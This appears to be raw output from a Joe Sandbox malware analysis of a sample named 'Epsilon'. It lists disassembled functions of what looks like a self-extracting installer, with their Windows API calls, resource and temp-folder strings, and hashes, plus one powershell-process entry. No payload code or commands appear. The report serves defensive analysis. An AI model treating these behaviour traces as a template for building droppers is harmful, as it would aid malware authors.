                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                                • String ID:
                                                                                • API String ID: 975904313-0
                                                                                • Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                                • Instruction ID: 879cd6f74b21e8fb00665b72c2f06831920b31cad91ca6110b9d08b7bdafe735
                                                                                • Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                                • Instruction Fuzzy Hash: 2751A661A0C6CDA5FB216F2594003F8EF91AB4DBA2FC98171CA8E07795CE3CD4679720
                                                                                Function 00007FF737823F74 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 71memorystringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF737825050: FindResourceExA.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF737825078
                                                                                  • Part of subcall function 00007FF737825050: SizeofResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF737825089
                                                                                  • Part of subcall function 00007FF737825050: FindResourceA.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250AF
                                                                                  • Part of subcall function 00007FF737825050: LoadResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250C0
                                                                                  • Part of subcall function 00007FF737825050: LockResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250CF
                                                                                  • Part of subcall function 00007FF737825050: memcpy_s.MSVCRT ref: 00007FF7378250EE
                                                                                  • Part of subcall function 00007FF737825050: FreeResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250FD
                                                                                • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF737823139), ref: 00007FF737823F95
                                                                                • LocalFree.KERNEL32 ref: 00007FF737824018
                                                                                  • Part of subcall function 00007FF737824DCC: LoadStringA.USER32 ref: 00007FF737824E60
                                                                                  • Part of subcall function 00007FF737824DCC: MessageBoxA.USER32 ref: 00007FF737824EA0
                                                                                  • Part of subcall function 00007FF737827700: GetLastError.KERNEL32 ref: 00007FF737827704
                                                                                • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF737823139), ref: 00007FF73782403E
                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00007FF737823139), ref: 00007FF73782409F
                                                                                  • Part of subcall function 00007FF737827AC8: FindResourceA.KERNEL32 ref: 00007FF737827AF2
                                                                                  • Part of subcall function 00007FF737827AC8: LoadResource.KERNEL32 ref: 00007FF737827B09
                                                                                  • Part of subcall function 00007FF737827AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF737827B3F
                                                                                  • Part of subcall function 00007FF737827AC8: FreeResource.KERNEL32 ref: 00007FF737827B51
                                                                                • LocalFree.KERNEL32 ref: 00007FF737824078
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                • String ID: <None>$LICENSE
                                                                                • API String ID: 2414642746-383193767
                                                                                • Opcode ID: c1ca9a88813ebfd35d576e9851fc4e2efdb847e2dd01f63958537ee31114ed88
                                                                                • Instruction ID: 404750afa5604cb55271e57821e7a1fb557a0423a6f2667c6dbd53c1f524f891
                                                                                • Opcode Fuzzy Hash: c1ca9a88813ebfd35d576e9851fc4e2efdb847e2dd01f63958537ee31114ed88
                                                                                • Instruction Fuzzy Hash: D2317C32A1D60AA6F750BF20E4147F9BE60FB88746FC04134C90D566A0DF7DA427AB30
                                                                                Function 00007FF73782772C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF73782114C: _vsnprintf.MSVCRT ref: 00007FF737821189
                                                                                • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF73782606F), ref: 00007FF737827763
                                                                                • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF73782606F), ref: 00007FF737827772
                                                                                • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF73782606F), ref: 00007FF7378277B8
                                                                                • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF73782606F), ref: 00007FF7378277EC
                                                                                • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF73782606F), ref: 00007FF737827805
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                • String ID: UPDFILE%lu
                                                                                • API String ID: 2922116661-2329316264
                                                                                • Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                                • Instruction ID: 9f57d9e7bba329b09ed4c9700e44ae832dc3e75ebfc6725b3b582ff167689714
                                                                                • Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                                • Instruction Fuzzy Hash: 2B318432A0CA49D6E710AB25A4001F9FFA1FF89B51F959635DA5E03794CF3CE416D710
                                                                                Function 00007FF737822244 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                • String ID: wininit.ini
                                                                                • API String ID: 3273605193-4206010578
                                                                                • Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                                • Instruction ID: 52a54e7f412f9003e28c6a1c813a2aa7f9bf50341d7e316f8427828a3493639c
                                                                                • Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                                • Instruction Fuzzy Hash: 52116D32608A8597E720AF21E8442F9FBA1FBCC706FC58131DA4E43654DF3CD51ADA10
                                                                                Function 00007FF737823840 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Text$DesktopDialogForegroundItem
                                                                                • String ID: Adv
                                                                                • API String ID: 761066910-921584719
                                                                                • Opcode ID: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
                                                                                • Instruction ID: 8ec8c43369dbddbb7f7945976f2068f4f4ca9d65cd4849c467393f7ee5ccd0d6
                                                                                • Opcode Fuzzy Hash: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
                                                                                • Instruction Fuzzy Hash: 11117060E0C74AA6F7543B55A4182F8EE50EB8EB43FD49030C90E1A794CF3CA467E720
                                                                                Function 00007FF73782494C Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 55memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF737825050: FindResourceExA.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF737825078
                                                                                  • Part of subcall function 00007FF737825050: SizeofResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF737825089
                                                                                  • Part of subcall function 00007FF737825050: FindResourceA.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250AF
                                                                                  • Part of subcall function 00007FF737825050: LoadResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250C0
                                                                                  • Part of subcall function 00007FF737825050: LockResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250CF
                                                                                  • Part of subcall function 00007FF737825050: memcpy_s.MSVCRT ref: 00007FF7378250EE
                                                                                  • Part of subcall function 00007FF737825050: FreeResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250FD
                                                                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF737823388), ref: 00007FF737824975
                                                                                • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF737823388), ref: 00007FF737824A11
                                                                                  • Part of subcall function 00007FF737824DCC: LoadStringA.USER32 ref: 00007FF737824E60
                                                                                  • Part of subcall function 00007FF737824DCC: MessageBoxA.USER32 ref: 00007FF737824EA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                • String ID: <None>$@$FINISHMSG
                                                                                • API String ID: 3507850446-4126004490
                                                                                • Opcode ID: b3ebb228102cb643f829919a1880d5340ae3d5d6023195a92137a1f68ae3d98d
                                                                                • Instruction ID: ba6676e236727c9b0aac8a2ed3a53f1382961135d2e37453ba0b74d2c07f0475
                                                                                • Opcode Fuzzy Hash: b3ebb228102cb643f829919a1880d5340ae3d5d6023195a92137a1f68ae3d98d
                                                                                • Instruction Fuzzy Hash: 7E11D472A0C24697F760AB20E4107FAFE90FB84786F949134CE0E02695DF3CD416DB20
                                                                                Function 00007FF7378279F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AttributesFile
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                • API String ID: 438848745-2381869747
                                                                                • Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                                • Instruction ID: a3d8fcd78371dc5a5b7f4f288b9d032e950f66c89b0d87fdac559bba1fa6e197
                                                                                • Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                                • Instruction Fuzzy Hash: D011C331A1C68AA6EF61AF11D4103F8BBA0FB89715FC40235C65E02691CF3CD22BD720
                                                                                Function 00007FF737821500 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                • String ID:
                                                                                • API String ID: 1273765764-0
                                                                                • Opcode ID: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
                                                                                • Instruction ID: 0898105dd206425cf5eb811e43e085fb9f6126759ad5075801366fc68f15b4de
                                                                                • Opcode Fuzzy Hash: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
                                                                                • Instruction Fuzzy Hash: 5E116061E0CA89A6EA606B14B5043F9EBA0FB89B56F944231CA5E463D5CF3CD0579720
                                                                                Function 00007FF737823BF4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                                                                • String ID: Adv
                                                                                • API String ID: 2312377310-921584719
                                                                                • Opcode ID: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                                                • Instruction ID: 06c183c903e9cf8fee4363dc4b35d58e30288d40a86bb5893930ef63da6d1476
                                                                                • Opcode Fuzzy Hash: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                                                • Instruction Fuzzy Hash: 9BA1B632A1D14AB6FB60AB1194542F9FEA4FF48756FD10035E90D83A90CE3DE867E720
                                                                                Function 00007FF7378278B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                • API String ID: 1065093856-1193786559
                                                                                • Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                                                • Instruction ID: 42f9e4989e013dbf2a42967cc0ed48c5205eab1f0990b3901e9f4ffc5a4aedef
                                                                                • Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                                                • Instruction Fuzzy Hash: C231AD3260C68596EB109F21E4407FABBA0FB89B95F944238DB9D47794CF7CD41ADB20
                                                                                Function 00007FF737825C60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: *MEMCAB
                                                                                • API String ID: 0-3211172518
                                                                                • Opcode ID: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                • Instruction ID: 86b0ddb7e50995f5fde2c0ff1d4fc16e947cee50ae2ad58e343f8ed21ef81d96
                                                                                • Opcode Fuzzy Hash: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                • Instruction Fuzzy Hash: 1D314C31A4EB4AA5EB50AB11F4483F9BBA0BB44752FC44276D96C42390DF3CE466D720
                                                                                Function 00007FF737828470 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                • String ID:
                                                                                • API String ID: 140117192-0
                                                                                • Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                • Instruction ID: b1d48fb51584d7c69f51c7f21857e6424c9469a930e844a97483cbc77491a9b0
                                                                                • Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                • Instruction Fuzzy Hash: DD41FC35A0CB09A1EB10AB18F8943B5BBA4FB88745FD04536D98D43764DF3DE066E760
                                                                                Function 00007FF737827C40 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Char$Prev$Next
                                                                                • String ID:
                                                                                • API String ID: 3260447230-0
                                                                                • Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                • Instruction ID: c0b840faf548f3bf54b7d8b6dfd17478b703fc60b7fd9a7d4b8f09eb82d53688
                                                                                • Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                • Instruction Fuzzy Hash: 9611A762A0C685A5FB111B22A5001B9EFA1E749FF2F898234DB5E03794CF2CD4528710
                                                                                Function 00007FF737828648 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                • String ID:
                                                                                • API String ID: 140117192-0
                                                                                • Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                • Instruction ID: de420e6e9894f314f910e099406b4e730c935eb60844f3d8335584a0ea8c8e9f
                                                                                • Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                • Instruction Fuzzy Hash: 9A21193590CB49A1EB00AF04F8843A5BBA0FB84746FD00536DA8D53764DF3EE066E760
                                                                                Function 00007FF737823B40 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                • String ID:
                                                                                • API String ID: 2776232527-0
                                                                                • Opcode ID: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                • Instruction ID: 8d79c4cc81d9df383e8940ad33c58f716b3bd0bc0e57066fb9237d56be8273ae
                                                                                • Opcode Fuzzy Hash: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                • Instruction Fuzzy Hash: 6F117772A1C646A7F7A0AF20E454BB6FE90FB99746FC09130DA4A42D84DF3CD05ADB10

                                                                                Executed Functions

                                                                                Function 00007FF848D537B5 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2467907001.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848d50000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                • Instruction ID: df177d92b8830416bef37d5717a16d9952393f763a851a515b6ab36be9f87dc5
                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                • Instruction Fuzzy Hash: 2D01847010CB0C4FD748EF0CE051AB6B3E0FB85364F10056EE58AC3651D726E882CB45